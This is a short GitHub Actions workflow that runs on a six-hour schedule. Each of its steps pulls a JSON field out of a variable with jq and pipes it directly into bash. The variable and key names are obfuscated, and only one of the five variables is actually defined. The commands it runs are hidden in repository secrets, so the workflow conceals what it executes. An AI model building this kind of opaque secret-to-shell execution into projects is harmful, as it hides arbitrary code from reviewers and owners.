name: pousuanshashou

on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pousuanshashou
        env:
          forpz53: ${{ secrets.forpz53 }}
        run: |
          echo $forpz53 | jq -r .s8 | /bin/bash
          echo $voo4 | jq -r .fpzp459 | /bin/bash
          echo $dxh03 | jq -r .ikyck48750 | /bin/bash
          echo $cqy60354 | jq -r .msza1862 | /bin/bash
          echo $sxe908 | jq -r .dul887 | /bin/bash

